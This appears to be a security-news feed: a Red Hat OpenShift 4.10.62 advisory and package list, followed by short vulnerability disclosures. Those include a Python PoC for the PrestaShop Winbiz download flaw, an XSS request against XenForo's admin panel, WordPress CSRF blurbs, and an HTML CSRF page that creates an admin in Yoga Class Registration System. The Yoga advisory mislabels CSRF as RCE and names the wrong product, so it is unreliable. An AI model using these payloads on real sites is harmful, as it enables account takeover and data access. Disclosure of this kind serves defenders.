Red Hat Security Advisory 2023-3625-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.10.62. Issues addressed include bypass, cross site request forgery, cross site scripting, and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.10.62 security update  
Advisory ID:       RHSA-2023:3625-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3625  
Issue date:        2023-06-23  
CVE Names:         CVE-2022-41966 CVE-2023-20860 CVE-2023-32977   
                   CVE-2023-32979 CVE-2023-32980 CVE-2023-32981   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.10.62 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.10 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.10.62. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:3626

Security Fix(es):

* xstream: Denial of Service by injecting recursive collections or maps  
based on element's hash values raising a stack overflow (CVE-2022-41966)

* springframework: Security Bypass With Un-Prefixed Double Wildcard Pattern  
(CVE-2023-20860)

* jenkins-2-plugin: workflow-job: Stored XSS vulnerability in Pipeline: Job  
Plugin (CVE-2023-32977)

* jenkins-2-plugin: email-ext: Missing permission check in Email Extension  
Plugin (CVE-2023-32979)

* jenkins-2-plugin: email-ext: CSRF vulnerability in Email Extension Plugin  
(CVE-2023-32980)

* jenkins-2-plugin: pipeline-utility-steps: Arbitrary file write  
vulnerability on agents in Pipeline Utility Steps Plugin (CVE-2023-32981)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.10 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.10 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2170431 - CVE-2022-41966 xstream: Denial of Service by injecting recursive collections or maps based on element's hash values raising a stack overflow  
2180528 - CVE-2023-20860 springframework: Security Bypass With Un-Prefixed Double Wildcard Pattern  
2207830 - CVE-2023-32977 jenkins-2-plugin: workflow-job: Stored XSS vulnerability in Pipeline: Job Plugin  
2207831 - CVE-2023-32979 jenkins-2-plugin: email-ext: Missing permission check in Email Extension Plugin  
2207833 - CVE-2023-32980 jenkins-2-plugin: email-ext: CSRF vulnerability in Email Extension Plugin  
2207835 - CVE-2023-32981 jenkins-2-plugin: pipeline-utility-steps: Arbitrary file write vulnerability on agents in Pipeline Utility Steps Plugin

6. Package List:

Red Hat OpenShift Container Platform 4.10:

Source:  
cri-o-1.23.5-16.rhaos4.10.gitbb2cc9a.el7.src.rpm  
openshift-4.10.0-202306081029.p0.g16bcd69.assembly.stream.el7.src.rpm  
openshift-ansible-4.10.0-202306081029.p0.g72c7be6.assembly.stream.el7.src.rpm  
openshift-clients-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el7.src.rpm

noarch:  
openshift-ansible-4.10.0-202306081029.p0.g72c7be6.assembly.stream.el7.noarch.rpm  
openshift-ansible-test-4.10.0-202306081029.p0.g72c7be6.assembly.stream.el7.noarch.rpm

x86_64:  
cri-o-1.23.5-16.rhaos4.10.gitbb2cc9a.el7.x86_64.rpm  
cri-o-debuginfo-1.23.5-16.rhaos4.10.gitbb2cc9a.el7.x86_64.rpm  
openshift-clients-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el7.x86_64.rpm  
openshift-clients-redistributable-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el7.x86_64.rpm  
openshift-hyperkube-4.10.0-202306081029.p0.g16bcd69.assembly.stream.el7.x86_64.rpm

Red Hat OpenShift Container Platform 4.10:

Source:  
cri-o-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.src.rpm  
jenkins-2-plugins-4.10.1685679861-1.el8.src.rpm  
jenkins-2.401.1.1685677065-1.el8.src.rpm  
kernel-4.18.0-305.93.1.el8_4.src.rpm  
kernel-rt-4.18.0-305.93.1.rt7.168.el8_4.src.rpm  
openshift-4.10.0-202306081029.p0.g16bcd69.assembly.stream.el8.src.rpm  
openshift-ansible-4.10.0-202306081029.p0.g72c7be6.assembly.stream.el8.src.rpm  
openshift-clients-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el8.src.rpm

aarch64:  
bpftool-4.18.0-305.93.1.el8_4.aarch64.rpm  
bpftool-debuginfo-4.18.0-305.93.1.el8_4.aarch64.rpm  
cri-o-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.aarch64.rpm  
cri-o-debuginfo-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.aarch64.rpm  
cri-o-debugsource-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.aarch64.rpm  
kernel-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-core-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-cross-headers-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debug-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debug-core-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debug-devel-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debug-modules-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debug-modules-internal-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debuginfo-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-devel-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-headers-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-modules-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-modules-extra-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-modules-internal-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-selftests-internal-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-tools-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-tools-libs-4.18.0-305.93.1.el8_4.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-305.93.1.el8_4.aarch64.rpm  
openshift-clients-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el8.aarch64.rpm  
openshift-hyperkube-4.10.0-202306081029.p0.g16bcd69.assembly.stream.el8.aarch64.rpm  
perf-4.18.0-305.93.1.el8_4.aarch64.rpm  
perf-debuginfo-4.18.0-305.93.1.el8_4.aarch64.rpm  
python3-perf-4.18.0-305.93.1.el8_4.aarch64.rpm  
python3-perf-debuginfo-4.18.0-305.93.1.el8_4.aarch64.rpm

noarch:  
jenkins-2-plugins-4.10.1685679861-1.el8.noarch.rpm  
jenkins-2.401.1.1685677065-1.el8.noarch.rpm  
kernel-doc-4.18.0-305.93.1.el8_4.noarch.rpm  
openshift-ansible-4.10.0-202306081029.p0.g72c7be6.assembly.stream.el8.noarch.rpm  
openshift-ansible-test-4.10.0-202306081029.p0.g72c7be6.assembly.stream.el8.noarch.rpm

ppc64le:  
bpftool-4.18.0-305.93.1.el8_4.ppc64le.rpm  
bpftool-debuginfo-4.18.0-305.93.1.el8_4.ppc64le.rpm  
cri-o-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.ppc64le.rpm  
cri-o-debuginfo-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.ppc64le.rpm  
cri-o-debugsource-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.ppc64le.rpm  
kernel-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-core-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-cross-headers-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debug-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debug-core-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debug-devel-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debug-modules-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debug-modules-internal-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debuginfo-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-devel-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-headers-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-ipaclones-internal-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-modules-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-modules-extra-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-modules-internal-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-selftests-internal-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-tools-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-tools-libs-4.18.0-305.93.1.el8_4.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-305.93.1.el8_4.ppc64le.rpm  
openshift-clients-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el8.ppc64le.rpm  
openshift-hyperkube-4.10.0-202306081029.p0.g16bcd69.assembly.stream.el8.ppc64le.rpm  
perf-4.18.0-305.93.1.el8_4.ppc64le.rpm  
perf-debuginfo-4.18.0-305.93.1.el8_4.ppc64le.rpm  
python3-perf-4.18.0-305.93.1.el8_4.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-305.93.1.el8_4.ppc64le.rpm

s390x:  
bpftool-4.18.0-305.93.1.el8_4.s390x.rpm  
bpftool-debuginfo-4.18.0-305.93.1.el8_4.s390x.rpm  
cri-o-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.s390x.rpm  
cri-o-debuginfo-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.s390x.rpm  
cri-o-debugsource-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.s390x.rpm  
kernel-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-core-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-cross-headers-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debug-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debug-core-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debug-debuginfo-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debug-devel-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debug-modules-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debug-modules-extra-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debug-modules-internal-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debuginfo-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-devel-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-headers-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-modules-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-modules-extra-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-modules-internal-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-selftests-internal-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-tools-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-tools-debuginfo-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-zfcpdump-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-zfcpdump-core-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-305.93.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-internal-4.18.0-305.93.1.el8_4.s390x.rpm  
openshift-clients-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el8.s390x.rpm  
openshift-hyperkube-4.10.0-202306081029.p0.g16bcd69.assembly.stream.el8.s390x.rpm  
perf-4.18.0-305.93.1.el8_4.s390x.rpm  
perf-debuginfo-4.18.0-305.93.1.el8_4.s390x.rpm  
python3-perf-4.18.0-305.93.1.el8_4.s390x.rpm  
python3-perf-debuginfo-4.18.0-305.93.1.el8_4.s390x.rpm

x86_64:  
bpftool-4.18.0-305.93.1.el8_4.x86_64.rpm  
bpftool-debuginfo-4.18.0-305.93.1.el8_4.x86_64.rpm  
cri-o-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.x86_64.rpm  
cri-o-debuginfo-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.x86_64.rpm  
cri-o-debugsource-1.23.5-16.rhaos4.10.gitbb2cc9a.el8.x86_64.rpm  
kernel-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-core-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-cross-headers-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debug-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debug-core-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debug-devel-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debug-modules-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debug-modules-internal-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debuginfo-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-devel-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-headers-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-ipaclones-internal-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-modules-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-modules-extra-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-modules-internal-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-rt-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debug-modules-internal-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-kvm-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-modules-internal-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-rt-selftests-internal-4.18.0-305.93.1.rt7.168.el8_4.x86_64.rpm  
kernel-selftests-internal-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-tools-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-tools-libs-4.18.0-305.93.1.el8_4.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-305.93.1.el8_4.x86_64.rpm  
openshift-clients-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el8.x86_64.rpm  
openshift-clients-redistributable-4.10.0-202306081029.p0.g3a7500d.assembly.stream.el8.x86_64.rpm  
openshift-hyperkube-4.10.0-202306081029.p0.g16bcd69.assembly.stream.el8.x86_64.rpm  
perf-4.18.0-305.93.1.el8_4.x86_64.rpm  
perf-debuginfo-4.18.0-305.93.1.el8_4.x86_64.rpm  
python3-perf-4.18.0-305.93.1.el8_4.x86_64.rpm  
python3-perf-debuginfo-4.18.0-305.93.1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41966  
https://access.redhat.com/security/cve/CVE-2023-20860  
https://access.redhat.com/security/cve/CVE-2023-32977  
https://access.redhat.com/security/cve/CVE-2023-32979  
https://access.redhat.com/security/cve/CVE-2023-32980  
https://access.redhat.com/security/cve/CVE-2023-32981  
https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJYTh9zjgjWX9erEAQh4mQ//XdFhFaXf/s5HOqOrjdm7tTJNHJ/C8tqG  
SxPUy+Eto4VtDbN/oET9uSy/a7c5LteR1YXwAkfSQZwlPPE/4Ok94nmEzXl4LVx4  
j+zwcIWsC3+WPTPzslf4tgljD+BfO43xXUyHahOGpUUFnYJ1R7mtBmgYx9qiiZ63  
AO2QgJbcsvKv4mTeHrGQK4ALqe47zsDW88IxA9ki+e9jxhy1tZwNjt8Z8rcJLesI  
jbmQCsPtWuJCddlzNcUpGYa8bWq5tLvHTzAprqjJMb8HwiMmLOWCAeorJYBVdhfZ  
5d0VpBxpWJv7WVWHzu7SObOsLXmcLU90uqTyKgkbp6OXTnj1O0fKde6EL7ISgr2Q  
qL5rjkL/01Gy2Iv2cyHRHIHCFEXtdbHOXdpwA7H5TysR35HRdb6iSUQK+5KdNgay  
3NAcfCxSmyF8Pq3P3sDY3YG7fYv/Xom3GO0oqqJHmP/AU4TbdnTGTl5fT7ZeQQxH  
09vF8z2myZl1Sr9njAGOvLTrJ21B8/mMJp8upfV7wqaPGHqyA4S0KydkDyzGwcQ5  
h+QzoekXuzTKBjjI7ZqZrwoZquIWgwL9IRxlejQLtgnnmEnBu/kbUtbrgB7PGMXW  
HLnn87J8Xk+VI59y8dV0EctvOl9ZLv3smbT6GKdBGYa56Np+yRIjQRYJ511GZihw  
+M8bdNZNn+k=  
=E1Cz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3625-01

PrestaShop Winbiz Payment module suffers from an improper limitation of a Pathname to a restricted directory.

    # Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory# Date: 2023-06-20# Dork: /modules/winbizpayment/downloads/download.php# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : webapps# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html# Version: 17.1.3 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-30198import requestsimport stringimport random# The base URL of the vulnerable sitebase_url = "http://example.com"# The URL of the login pagelogin_url = base_url + "/authentication.php"# The username and password for the admin accountusername = "admin"password = "password123"# The URL of the vulnerable download.php filedownload_url = base_url + "/modules/winbizpayment/downloads/download.php"# The ID of the order to downloadorder_id = 1234# The path to save the downloaded filefile_path = "/tmp/order_%d.pdf" % order_id# The session cookies to use for the requestssession_cookies = None# Generate a random string for the CSRF tokencsrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))# Send a POST request to the login page to authenticate as the admin userlogin_data = {"email": username, "passwd": password, "csrf_token": csrf_token}session = requests.Session()response = session.post(login_url, data=login_data)# Save the session cookies for future requestssession_cookies = session.cookies.get_dict()# Generate a random string for the CSRF tokencsrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))# Send a POST request to the download.php file to download the order PDFdownload_data = {"id_order": order_id, "csrf_token": csrf_token}response = session.post(download_url, cookies=session_cookies, data=download_data)# Save the downloaded file to diskwith open(file_path, "wb") as f:    f.write(response.content)# Print a message indicating that the file has been downloadedprint("File downloaded to %s" % file_path)

PrestaShop Winbiz Payment Improper Limitation

Xenforo version 2.2.13 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS# Date: 2023-06-24# Exploit Author: Furkan Karaarslan# Category : Webapps# Vendor Homepage: https://x.com/admin.php?smilies# Version: 2.2.12 (REQUIRED)# Tested on: Windows/Linux# CVE : -----------------------------------------------------------------------------RequestsPOST /admin.php?smilie-categories/0/save HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/admin.php?smilies/X-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422Content-Length: 1038Origin: http://127.0.0.1Connection: closeCookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfToken"1687616851,83fd2350307156281e51b17e20fe575b-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="title"<img src=x onerror=alert(document.domain)>-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="display_order"1-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfRequestUri"/admin.php?smilies/-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfWithData"1-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfToken"1687616849,b74724a115448b864ba2db8f89f415f5-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfResponseType"json-----------------------------333176689514537912041638543422--Response: After it is created, an alert comes immediately.

Xenforo 2.2.13 Cross Site Scripting

The KiviCare WordPress plugin before 3.2.1 does not have CSRF checks (either flawed or missing completely) in various AJAX actions, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks. This includes, but is not limited to: Delete arbitrary appointments/medical records/etc, create/update various users (patients, doctors etc)

CVE-2023-2628

The KiviCare WordPress plugin before 3.2.1 does not have proper CSRF and authorisation checks in various AJAX actions, allowing any authenticated users, such as subscriber to call them. Attacks include but are not limited to: Add arbitrary Clinic Admin/Doctors/etc and update plugin's settings

CVE-2023-2627

The WP Inventory Manager WordPress plugin before 2.1.0.14 does not have CSRF checks, which could allow attackers to make logged-in admins delete Inventory Items via a CSRF attack

CVE-2023-2842

The Gravity Forms Google Sheet Connector WordPress plugin before 1.3.5, gsheetconnector-gravityforms-pro WordPress plugin through 1.3.5 does not have CSRF check when updating its Access Code, which could allow attackers to make logged in admin change the access code to an arbitrary one via a CSRF attack

CVE-2023-2326

The wpbrutalai WordPress plugin before 2.0.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin via CSRF.

CVE-2023-2601

Yoga Class Registration System version 1.0 allows an administrator to execute commands on the server. This is possible because the application does not correctly validate the thumbnails of the classes uploaded by the administrators.






3.  Wyckoff

**Summary**

**Name**

Yoga Class Registration System 1.0 - RCE

**Code name**

Wyckoff

**Product**

Yoga Class Registration System

**Affected versions**

Version 1.0

**State**

Public

**Release date**

2023-06-23

**Vulnerability**

**Kind**

Cross-site request forgery

**Rule**

007\. Cross-site request forgery

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

**CVSSv3 Base Score**

6.5

**Exploit available**

Yes

**CVE ID(s)**

CVE-2023-1722

**Description**

Yoga Class Registration System Version 1.0 allows an external attacker to elevate privileges in the application. This is possible because the application is not protected against CSRF attacks.

**Vulnerability**

The application is not protected against CSRF attacks, so an attacker can persuade an administrator to create a new account with administrative permissions, along with the credentials set by the attacker.

**Exploitation**

To exploit the vulnerability I have written the following exploit:

    <!DOCTYPE html>
    <html>
      <body>
        <script>
          function submitRequest()
          {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http:\/\/retr02332.com\/php-ycrs\/classes\/Users.php?f=save", true);
            xhr.setRequestHeader("Accept", "*\/*");
            xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
            xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------426135374114296864734166274622");
            xhr.withCredentials = true;
            var body = "-----------------------------426135374114296864734166274622\r\n" +
              "Content-Disposition: form-data; name=\"id\"\r\n" +
              "\r\n" +
              "\r\n" +
              "-----------------------------426135374114296864734166274622\r\n" +
              "Content-Disposition: form-data; name=\"firstname\"\r\n" +
              "\r\n" +
              "test\r\n" +
              "-----------------------------426135374114296864734166274622\r\n" +
              "Content-Disposition: form-data; name=\"middlename\"\r\n" +
              "\r\n" +
              "test\r\n" +
              "-----------------------------426135374114296864734166274622\r\n" +
              "Content-Disposition: form-data; name=\"lastname\"\r\n" +
              "\r\n" +
              "test\r\n" +
              "-----------------------------426135374114296864734166274622\r\n" +
              "Content-Disposition: form-data; name=\"username\"\r\n" +
              "\r\n" +
              "test\r\n" +
              "-----------------------------426135374114296864734166274622\r\n" +
              "Content-Disposition: form-data; name=\"password\"\r\n" +
              "\r\n" +
              "test\r\n" +
              "-----------------------------426135374114296864734166274622\r\n" +
              "Content-Disposition: form-data; name=\"type\"\r\n" +
              "\r\n" +
              "1\r\n" +
              "-----------------------------426135374114296864734166274622\r\n" +
              "Content-Disposition: form-data; name=\"img\"; filename=\"\"\r\n" +
              "Content-Type: application/octet-stream\r\n" +
              "\r\n" +
              "\r\n" +
              "-----------------------------426135374114296864734166274622--\r\n";
            var aBody = new Uint8Array(body.length);
            for (var i = 0; i < aBody.length; i++)
              aBody[i] = body.charCodeAt(i);
            xhr.send(new Blob([aBody]));
          }
        </script>
        <form action="#">
          <input type="button" value="Submit request" onclick="submitRequest();" />
        </form>
      </body>
    </html>
    

**Evidence of exploitation**

**Our security policy**

We have reserved the CVE-2023-1722 to refer to these issues from now on.

*   https://fluidattacks.com/advisories/policy/

**System Information**

*   Version: OrangeScrum 2.0.11
    
*   Operating System: GNU/Linux
    

**Mitigation**

There is currently no patch available for this vulnerability.

**Credits**

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

**References**

**Vendor page** https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html

**Timeline**

2023-03-31

Vulnerability discovered.

2023-03-31

Vendor contacted.

2023-03-31

Vendor replied acknowledging the report.

2023-06-23

Public Disclosure.

CVE-2023-1722: Yoga Class Registration System 1.0 - ATO | Advisories | Fluid Attacks

A Cross-Site Request Forgery (CSRF) in POS Codekop v2.0 allows attackers to escalate privileges.

Tag

#csrf